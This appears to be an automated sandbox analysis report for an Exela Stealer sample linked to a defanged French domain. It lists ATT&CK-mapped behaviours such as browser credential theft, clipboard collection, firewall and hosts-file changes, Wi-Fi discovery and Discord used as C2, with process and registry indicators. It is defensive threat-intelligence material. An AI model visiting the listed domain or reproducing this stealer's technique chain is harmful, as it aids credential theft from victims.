exelastealer | hxxp://scorpix[.]fr

Analysis

max time kernel
289s
max time network
290s
platform
windows10-2004_x64
resource
win10v2004-20240730-en
resource tags

arch:x64arch:x86image:win10v2004-20240730-enlocale:en-usos:windows10-2004-x64system
submitted
01/08/2024, 16:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

http://scorpix.fr

Score

10^/10

exelastealer collection credential_access defense_evasion discovery evasion execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Exela Stealer
Exela Stealer is an open source stealer originally written in .NET and later transitioned to Python that was first observed in August 2023.
stealer exelastealer
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2276	powershell.exe
3244	powershell.exe
5788	powershell.exe
5196	powershell.exe
6120	powershell.exe
2280	powershell.exe
3628	powershell.exe
5208	powershell.exe
5868	powershell.exe
1944	powershell.exe
620	powershell.exe
4808	powershell.exe

Downloads MZ/PE file

Drops file in Drivers directory 6 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	ScorpixV2.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	ScorpixV2.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Modifies Windows Firewall 2 TTPs 4 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
4760	netsh.exe
5316	netsh.exe
4800	netsh.exe
3648	netsh.exe

Clipboard Data 1 TTPs 8 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
3348	cmd.exe
4668	powershell.exe
4076	cmd.exe
3156	powershell.exe
5792	cmd.exe
3936	powershell.exe
5856	cmd.exe
2656	powershell.exe

Executes dropped EXE 22 IoCs

pid	Process
3936	ScorpixV2.exe
3672	ScorpixV2.exe
1900	ScorpixV2.exe
4076	ScorpixV2.exe
5408	ScorpixV2.exe
5228	bound.exe
5740	bound.exe
5808	ScorpixV2.exe
5952	ScorpixV2.exe
6080	ScorpixV2.exe
6080	rar.exe
6024	ScorpixV2.exe
4960	ScorpixV2.exe
4924	bound.exe
5724	bound.exe
4360	ScorpixV2.exe
2696	ScorpixV2.exe
2032	ScorpixV2.exe
1948	ScorpixV2.exe
1976	rar.exe
5488	ScorpixV2.exe
5520	ScorpixV2.exe

Loads dropped DLL 64 IoCs

pid	Process
3672	ScorpixV2.exe
3672	ScorpixV2.exe
3672	ScorpixV2.exe
3672	ScorpixV2.exe
4076	ScorpixV2.exe
4076	ScorpixV2.exe
4076	ScorpixV2.exe
4076	ScorpixV2.exe
4076	ScorpixV2.exe
4076	ScorpixV2.exe
4076	ScorpixV2.exe
4076	ScorpixV2.exe
4076	ScorpixV2.exe
4076	ScorpixV2.exe
4076	ScorpixV2.exe
4076	ScorpixV2.exe
4076	ScorpixV2.exe
4076	ScorpixV2.exe
4076	ScorpixV2.exe
4076	ScorpixV2.exe
4076	ScorpixV2.exe
3672	ScorpixV2.exe
3672	ScorpixV2.exe
3672	ScorpixV2.exe
3672	ScorpixV2.exe
3672	ScorpixV2.exe
3672	ScorpixV2.exe
3672	ScorpixV2.exe
3672	ScorpixV2.exe
5740	bound.exe
5740	bound.exe
3672	ScorpixV2.exe
5808	ScorpixV2.exe
3672	ScorpixV2.exe
5808	ScorpixV2.exe
5740	bound.exe
5740	bound.exe
5740	bound.exe
5808	ScorpixV2.exe
5808	ScorpixV2.exe
5740	bound.exe
5740	bound.exe
5740	bound.exe
5740	bound.exe
5740	bound.exe
5740	bound.exe
5740	bound.exe
3672	ScorpixV2.exe
3672	ScorpixV2.exe
5740	bound.exe
5740	bound.exe
5740	bound.exe
6080	ScorpixV2.exe
6080	ScorpixV2.exe
5740	bound.exe
5740	bound.exe
5740	bound.exe
5740	bound.exe
5740	bound.exe
5740	bound.exe
5808	ScorpixV2.exe
5808	ScorpixV2.exe
5808	ScorpixV2.exe
5808	ScorpixV2.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0007000000023511-145.dat	upx
behavioral1/memory/3672-149-0x00007FFB71BD0000-0x00007FFB7203E000-memory.dmp	upx
behavioral1/files/0x0007000000023503-160.dat	upx
behavioral1/memory/3672-185-0x00007FFB726E0000-0x00007FFB72704000-memory.dmp	upx
behavioral1/memory/3672-186-0x00007FFB7B3A0000-0x00007FFB7B3AF000-memory.dmp	upx
behavioral1/files/0x0007000000023526-206.dat	upx
behavioral1/memory/4076-217-0x00007FFB76230000-0x00007FFB7623F000-memory.dmp	upx
behavioral1/files/0x000700000002352d-216.dat	upx
behavioral1/files/0x000700000002352c-215.dat	upx
behavioral1/files/0x000700000002352b-214.dat	upx
behavioral1/files/0x0007000000023527-211.dat	upx
behavioral1/memory/4076-237-0x00007FFB5EF30000-0x00007FFB5F2A7000-memory.dmp	upx
behavioral1/memory/4076-241-0x00007FFB5EE10000-0x00007FFB5EF28000-memory.dmp	upx
behavioral1/memory/4076-240-0x00007FFB72930000-0x00007FFB7293D000-memory.dmp	upx
behavioral1/memory/4076-239-0x00007FFB6EC80000-0x00007FFB6EC94000-memory.dmp	upx
behavioral1/memory/4076-236-0x00007FFB5F2B0000-0x00007FFB5F367000-memory.dmp	upx
behavioral1/memory/4076-235-0x00007FFB708B0000-0x00007FFB708DE000-memory.dmp	upx
behavioral1/memory/4076-234-0x00007FFB76150000-0x00007FFB7615D000-memory.dmp	upx
behavioral1/memory/4076-233-0x00007FFB70910000-0x00007FFB70929000-memory.dmp	upx
behavioral1/memory/4076-232-0x00007FFB5F370000-0x00007FFB5F4D9000-memory.dmp	upx
behavioral1/memory/4076-231-0x00007FFB71B50000-0x00007FFB71B6F000-memory.dmp	upx
behavioral1/memory/4076-230-0x00007FFB722D0000-0x00007FFB722E9000-memory.dmp	upx
behavioral1/memory/4076-229-0x00007FFB71B70000-0x00007FFB71B9D000-memory.dmp	upx
behavioral1/files/0x0007000000023525-210.dat	upx
behavioral1/memory/4076-218-0x00007FFB71BA0000-0x00007FFB71BC4000-memory.dmp	upx
behavioral1/memory/4076-202-0x00007FFB5F4E0000-0x00007FFB5F94E000-memory.dmp	upx
behavioral1/files/0x000700000002350a-184.dat	upx
behavioral1/files/0x0007000000023509-183.dat	upx
behavioral1/files/0x0007000000023508-182.dat	upx
behavioral1/files/0x0007000000023507-181.dat	upx
behavioral1/files/0x0007000000023506-180.dat	upx
behavioral1/files/0x0007000000023505-179.dat	upx
behavioral1/files/0x0007000000023504-178.dat	upx
behavioral1/files/0x0007000000023502-177.dat	upx
behavioral1/memory/3672-277-0x00007FFB5B3A0000-0x00007FFB5B3B9000-memory.dmp	upx
behavioral1/memory/3672-285-0x00007FFB5A890000-0x00007FFB5A9F9000-memory.dmp	upx
behavioral1/memory/3672-284-0x00007FFB5B2A0000-0x00007FFB5B2BF000-memory.dmp	upx
behavioral1/memory/3672-276-0x00007FFB62A80000-0x00007FFB62AAD000-memory.dmp	upx
behavioral1/memory/3672-351-0x00007FFB63010000-0x00007FFB6303E000-memory.dmp	upx
behavioral1/memory/3672-352-0x00007FFB726E0000-0x00007FFB72704000-memory.dmp	upx
behavioral1/memory/3672-350-0x00007FFB71BD0000-0x00007FFB7203E000-memory.dmp	upx
behavioral1/memory/3672-356-0x00007FFB56AA0000-0x00007FFB56E17000-memory.dmp	upx
behavioral1/memory/5740-360-0x00007FFB70900000-0x00007FFB7090F000-memory.dmp	upx
behavioral1/memory/5740-362-0x00007FFB5BD10000-0x00007FFB5BD34000-memory.dmp	upx
behavioral1/memory/3672-401-0x00007FFB5A890000-0x00007FFB5A9F9000-memory.dmp	upx
behavioral1/memory/3672-406-0x00007FFB56AA0000-0x00007FFB56E17000-memory.dmp	upx
behavioral1/memory/5740-422-0x00007FFB5B450000-0x00007FFB5B472000-memory.dmp	upx
behavioral1/memory/6080-430-0x00007FFB5B270000-0x00007FFB5B294000-memory.dmp	upx
behavioral1/memory/6080-429-0x00007FFB6B7B0000-0x00007FFB6B7BF000-memory.dmp	upx
behavioral1/memory/5808-443-0x00007FFB53C70000-0x00007FFB53FE7000-memory.dmp	upx
behavioral1/memory/5808-459-0x00007FFB56630000-0x00007FFB56A9E000-memory.dmp	upx
behavioral1/memory/5808-481-0x00007FFB53C70000-0x00007FFB53FE7000-memory.dmp	upx
behavioral1/memory/5740-493-0x00007FFB5BAE0000-0x00007FFB5BC49000-memory.dmp	upx
behavioral1/memory/6080-509-0x00007FFB71BD0000-0x00007FFB71BE9000-memory.dmp	upx
behavioral1/memory/6080-508-0x00007FFB63010000-0x00007FFB6303D000-memory.dmp	upx
behavioral1/memory/6080-507-0x00007FFB71C40000-0x00007FFB71C4D000-memory.dmp	upx
behavioral1/memory/6080-506-0x00007FFB728C0000-0x00007FFB728D4000-memory.dmp	upx
behavioral1/memory/6080-505-0x00007FFB5A900000-0x00007FFB5A9B7000-memory.dmp	upx
behavioral1/memory/6080-504-0x00007FFB538F0000-0x00007FFB53C67000-memory.dmp	upx
behavioral1/memory/5740-492-0x00007FFB5BC50000-0x00007FFB5BC6F000-memory.dmp	upx
behavioral1/memory/5740-491-0x00007FFB5BCC0000-0x00007FFB5BCD9000-memory.dmp	upx
behavioral1/memory/6080-490-0x00007FFB5A9C0000-0x00007FFB5AB29000-memory.dmp	upx
behavioral1/memory/6080-489-0x00007FFB68C00000-0x00007FFB68C1F000-memory.dmp	upx
behavioral1/memory/6080-488-0x00007FFB71BD0000-0x00007FFB71BE9000-memory.dmp	upx

Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 14 IoCs

Web Service

T1102

flow	ioc
86	discord.com
89	discord.com
119	discord.com
121	discord.com
87	discord.com
90	discord.com
117	discord.com
79	discord.com
80	discord.com
108	discord.com
85	discord.com
107	discord.com
118	discord.com
120	discord.com

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
56	ip-api.com
71	ip-api.com
104	ip-api.com

Network Service Discovery 1 TTPs 4 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

pid	Process
5364	cmd.exe
3456	ARP.EXE
5620	cmd.exe
5632	ARP.EXE

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\System32\DriverStore\FileRepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF	chrome.exe
File created	\??\c:\windows\system32\driverstore\filerepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF	chrome.exe

Enumerates processes with tasklist 1 TTPs 20 IoCs

discovery

Process Discovery

T1057

pid	Process
6008	tasklist.exe
5220	tasklist.exe
4412	tasklist.exe
5428	tasklist.exe
3708	tasklist.exe
5824	tasklist.exe
5988	tasklist.exe
5084	tasklist.exe
3168	tasklist.exe
3920	tasklist.exe
2240	tasklist.exe
5248	tasklist.exe
6140	tasklist.exe
5300	tasklist.exe
3556	tasklist.exe
5604	tasklist.exe
5972	tasklist.exe
3280	tasklist.exe
5244	tasklist.exe
5460	tasklist.exe

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Crashpad\metadata	setup.exe
File opened for modification	C:\Program Files\Crashpad\settings.dat	setup.exe

Launches sc.exe 2 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2264	sc.exe
5820	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 24 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 8 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
1912	cmd.exe
64	netsh.exe
3064	cmd.exe
5344	netsh.exe
3156	cmd.exe
2636	netsh.exe
4892	cmd.exe
5080	netsh.exe

System Network Connections Discovery 1 TTPs 2 IoCs

Attempt to get a listing of network connections.

discovery

System Network Connections Discovery

T1049

pid	Process
4000	NETSTAT.EXE
5008	NETSTAT.EXE

Collects information from the system 1 TTPs 2 IoCs

Uses WMIC.exe to find detailed system information.

Data from Local System

T1005

pid	Process
5268	WMIC.exe
5380	WMIC.exe

Detects videocard installed 1 TTPs 8 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
5844	WMIC.exe
2872	WMIC.exe
5804	WMIC.exe
2876	WMIC.exe
2764	WMIC.exe
5652	WMIC.exe
2032	WMIC.exe
3600	WMIC.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Gathers network information 2 TTPs 4 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
4000	NETSTAT.EXE
2860	ipconfig.exe
5008	NETSTAT.EXE
1752	ipconfig.exe

Gathers system information 1 TTPs 4 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
5140	systeminfo.exe
5440	systeminfo.exe
2784	systeminfo.exe
1296	systeminfo.exe

Kills process with taskkill 30 IoCs

evasion

pid	Process
5888	taskkill.exe
5512	taskkill.exe
5776	taskkill.exe
5476	taskkill.exe
5884	taskkill.exe
5568	taskkill.exe
5632	taskkill.exe
5336	taskkill.exe
4564	taskkill.exe
5612	taskkill.exe
5828	taskkill.exe
3688	taskkill.exe
5584	taskkill.exe
5748	taskkill.exe
5144	taskkill.exe
5224	taskkill.exe
3844	taskkill.exe
5424	taskkill.exe
5592	taskkill.exe
4392	taskkill.exe
5920	taskkill.exe
64	taskkill.exe
1176	taskkill.exe
4960	taskkill.exe
5848	taskkill.exe
5900	taskkill.exe
5836	taskkill.exe
5384	taskkill.exe
5420	taskkill.exe
5644	taskkill.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133670027798115629"	chrome.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 200778.crdownload:SmartScreen	msedge.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
800	msedge.exe
800	msedge.exe
3948	msedge.exe
3948	msedge.exe
4104	identity_helper.exe
4104	identity_helper.exe
4144	msedge.exe
4144	msedge.exe
3628	powershell.exe
3628	powershell.exe
3628	powershell.exe
5208	powershell.exe
5208	powershell.exe
5196	powershell.exe
5196	powershell.exe
5208	powershell.exe
5196	powershell.exe
5868	powershell.exe
5868	powershell.exe
5868	powershell.exe
3936	powershell.exe
3936	powershell.exe
3936	powershell.exe
6104	powershell.exe
6104	powershell.exe
6104	powershell.exe
2656	powershell.exe
2656	powershell.exe
2656	powershell.exe
6120	powershell.exe
6120	powershell.exe
6120	powershell.exe
5292	powershell.exe
5292	powershell.exe
5292	powershell.exe
2280	powershell.exe
2280	powershell.exe
2280	powershell.exe
3804	powershell.exe
3804	powershell.exe
3804	powershell.exe
620	powershell.exe
620	powershell.exe
2276	powershell.exe
2276	powershell.exe
1944	powershell.exe
1944	powershell.exe
2276	powershell.exe
620	powershell.exe
1944	powershell.exe
4808	powershell.exe
4808	powershell.exe
4668	powershell.exe
4668	powershell.exe
4208	powershell.exe
4208	powershell.exe
4668	powershell.exe
4208	powershell.exe
3244	powershell.exe
3244	powershell.exe
4860	powershell.exe
4860	powershell.exe
4860	powershell.exe
3156	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 28 IoCs

pid	Process
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
2896	chrome.exe
2896	chrome.exe
2896	chrome.exe
2896	chrome.exe
2896	chrome.exe
2896	chrome.exe
2896	chrome.exe
2896	chrome.exe
2896	chrome.exe
2896	chrome.exe
2896	chrome.exe
2896	chrome.exe
2896	chrome.exe
2896	chrome.exe
2896	chrome.exe
2896	chrome.exe
2896	chrome.exe
2896	chrome.exe
2896	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3628	powershell.exe
Token: SeDebugPrivilege	5248	tasklist.exe
Token: SeDebugPrivilege	5208	powershell.exe
Token: SeDebugPrivilege	5196	powershell.exe
Token: SeIncreaseQuotaPrivilege	5244	WMIC.exe
Token: SeSecurityPrivilege	5244	WMIC.exe
Token: SeTakeOwnershipPrivilege	5244	WMIC.exe
Token: SeLoadDriverPrivilege	5244	WMIC.exe
Token: SeSystemProfilePrivilege	5244	WMIC.exe
Token: SeSystemtimePrivilege	5244	WMIC.exe
Token: SeProfSingleProcessPrivilege	5244	WMIC.exe
Token: SeIncBasePriorityPrivilege	5244	WMIC.exe
Token: SeCreatePagefilePrivilege	5244	WMIC.exe
Token: SeBackupPrivilege	5244	WMIC.exe
Token: SeRestorePrivilege	5244	WMIC.exe
Token: SeShutdownPrivilege	5244	WMIC.exe
Token: SeDebugPrivilege	5244	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5244	WMIC.exe
Token: SeRemoteShutdownPrivilege	5244	WMIC.exe
Token: SeUndockPrivilege	5244	WMIC.exe
Token: SeManageVolumePrivilege	5244	WMIC.exe
Token: 33	5244	WMIC.exe
Token: 34	5244	WMIC.exe
Token: 35	5244	WMIC.exe
Token: 36	5244	WMIC.exe
Token: SeIncreaseQuotaPrivilege	5244	WMIC.exe
Token: SeSecurityPrivilege	5244	WMIC.exe
Token: SeTakeOwnershipPrivilege	5244	WMIC.exe
Token: SeLoadDriverPrivilege	5244	WMIC.exe
Token: SeSystemProfilePrivilege	5244	WMIC.exe
Token: SeSystemtimePrivilege	5244	WMIC.exe
Token: SeProfSingleProcessPrivilege	5244	WMIC.exe
Token: SeIncBasePriorityPrivilege	5244	WMIC.exe
Token: SeCreatePagefilePrivilege	5244	WMIC.exe
Token: SeBackupPrivilege	5244	WMIC.exe
Token: SeRestorePrivilege	5244	WMIC.exe
Token: SeShutdownPrivilege	5244	WMIC.exe
Token: SeDebugPrivilege	5244	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5244	WMIC.exe
Token: SeRemoteShutdownPrivilege	5244	WMIC.exe
Token: SeUndockPrivilege	5244	WMIC.exe
Token: SeManageVolumePrivilege	5244	WMIC.exe
Token: 33	5244	WMIC.exe
Token: 34	5244	WMIC.exe
Token: 35	5244	WMIC.exe
Token: 36	5244	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2764	WMIC.exe
Token: SeSecurityPrivilege	2764	WMIC.exe
Token: SeTakeOwnershipPrivilege	2764	WMIC.exe
Token: SeLoadDriverPrivilege	2764	WMIC.exe
Token: SeSystemProfilePrivilege	2764	WMIC.exe
Token: SeSystemtimePrivilege	2764	WMIC.exe
Token: SeProfSingleProcessPrivilege	2764	WMIC.exe
Token: SeIncBasePriorityPrivilege	2764	WMIC.exe
Token: SeCreatePagefilePrivilege	2764	WMIC.exe
Token: SeBackupPrivilege	2764	WMIC.exe
Token: SeRestorePrivilege	2764	WMIC.exe
Token: SeShutdownPrivilege	2764	WMIC.exe
Token: SeDebugPrivilege	2764	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2764	WMIC.exe
Token: SeRemoteShutdownPrivilege	2764	WMIC.exe
Token: SeUndockPrivilege	2764	WMIC.exe
Token: SeManageVolumePrivilege	2764	WMIC.exe
Token: 33	2764	WMIC.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
2896	chrome.exe
2896	chrome.exe
2896	chrome.exe
2896	chrome.exe
2896	chrome.exe
2896	chrome.exe
2896	chrome.exe
2896	chrome.exe
2896	chrome.exe
2896	chrome.exe
2896	chrome.exe
2896	chrome.exe
2896	chrome.exe
2896	chrome.exe
2896	chrome.exe
2896	chrome.exe
2896	chrome.exe
2896	chrome.exe
2896	chrome.exe
2896	chrome.exe
2896	chrome.exe
2896	chrome.exe
2896	chrome.exe
2896	chrome.exe
2896	chrome.exe

Suspicious use of SendNotifyMessage 48 IoCs

pid	Process
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
2896	chrome.exe
2896	chrome.exe
2896	chrome.exe
2896	chrome.exe
2896	chrome.exe
2896	chrome.exe
2896	chrome.exe
2896	chrome.exe
2896	chrome.exe
2896	chrome.exe
2896	chrome.exe
2896	chrome.exe
2896	chrome.exe
2896	chrome.exe
2896	chrome.exe
2896	chrome.exe
2896	chrome.exe
2896	chrome.exe
2896	chrome.exe
2896	chrome.exe
2896	chrome.exe
2896	chrome.exe
2896	chrome.exe
2896	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3948 wrote to memory of 3028	3948	msedge.exe	83
PID 3948 wrote to memory of 3028	3948	msedge.exe	83
PID 3948 wrote to memory of 3468	3948	msedge.exe	86
PID 3948 wrote to memory of 3468	3948	msedge.exe	86
PID 3948 wrote to memory of 3468	3948	msedge.exe	86
PID 3948 wrote to memory of 3468	3948	msedge.exe	86
PID 3948 wrote to memory of 3468	3948	msedge.exe	86
PID 3948 wrote to memory of 3468	3948	msedge.exe	86
PID 3948 wrote to memory of 3468	3948	msedge.exe	86
PID 3948 wrote to memory of 3468	3948	msedge.exe	86
PID 3948 wrote to memory of 3468	3948	msedge.exe	86
PID 3948 wrote to memory of 3468	3948	msedge.exe	86
PID 3948 wrote to memory of 3468	3948	msedge.exe	86
PID 3948 wrote to memory of 3468	3948	msedge.exe	86
PID 3948 wrote to memory of 3468	3948	msedge.exe	86
PID 3948 wrote to memory of 3468	3948	msedge.exe	86
PID 3948 wrote to memory of 3468	3948	msedge.exe	86
PID 3948 wrote to memory of 3468	3948	msedge.exe	86
PID 3948 wrote to memory of 3468	3948	msedge.exe	86
PID 3948 wrote to memory of 3468	3948	msedge.exe	86
PID 3948 wrote to memory of 3468	3948	msedge.exe	86
PID 3948 wrote to memory of 3468	3948	msedge.exe	86
PID 3948 wrote to memory of 3468	3948	msedge.exe	86
PID 3948 wrote to memory of 3468	3948	msedge.exe	86
PID 3948 wrote to memory of 3468	3948	msedge.exe	86
PID 3948 wrote to memory of 3468	3948	msedge.exe	86
PID 3948 wrote to memory of 3468	3948	msedge.exe	86
PID 3948 wrote to memory of 3468	3948	msedge.exe	86
PID 3948 wrote to memory of 3468	3948	msedge.exe	86
PID 3948 wrote to memory of 3468	3948	msedge.exe	86
PID 3948 wrote to memory of 3468	3948	msedge.exe	86
PID 3948 wrote to memory of 3468	3948	msedge.exe	86
PID 3948 wrote to memory of 3468	3948	msedge.exe	86
PID 3948 wrote to memory of 3468	3948	msedge.exe	86
PID 3948 wrote to memory of 3468	3948	msedge.exe	86
PID 3948 wrote to memory of 3468	3948	msedge.exe	86
PID 3948 wrote to memory of 3468	3948	msedge.exe	86
PID 3948 wrote to memory of 3468	3948	msedge.exe	86
PID 3948 wrote to memory of 3468	3948	msedge.exe	86
PID 3948 wrote to memory of 3468	3948	msedge.exe	86
PID 3948 wrote to memory of 3468	3948	msedge.exe	86
PID 3948 wrote to memory of 3468	3948	msedge.exe	86
PID 3948 wrote to memory of 800	3948	msedge.exe	87
PID 3948 wrote to memory of 800	3948	msedge.exe	87
PID 3948 wrote to memory of 4020	3948	msedge.exe	88
PID 3948 wrote to memory of 4020	3948	msedge.exe	88
PID 3948 wrote to memory of 4020	3948	msedge.exe	88
PID 3948 wrote to memory of 4020	3948	msedge.exe	88
PID 3948 wrote to memory of 4020	3948	msedge.exe	88
PID 3948 wrote to memory of 4020	3948	msedge.exe	88
PID 3948 wrote to memory of 4020	3948	msedge.exe	88
PID 3948 wrote to memory of 4020	3948	msedge.exe	88
PID 3948 wrote to memory of 4020	3948	msedge.exe	88
PID 3948 wrote to memory of 4020	3948	msedge.exe	88
PID 3948 wrote to memory of 4020	3948	msedge.exe	88
PID 3948 wrote to memory of 4020	3948	msedge.exe	88
PID 3948 wrote to memory of 4020	3948	msedge.exe	88
PID 3948 wrote to memory of 4020	3948	msedge.exe	88
PID 3948 wrote to memory of 4020	3948	msedge.exe	88
PID 3948 wrote to memory of 4020	3948	msedge.exe	88
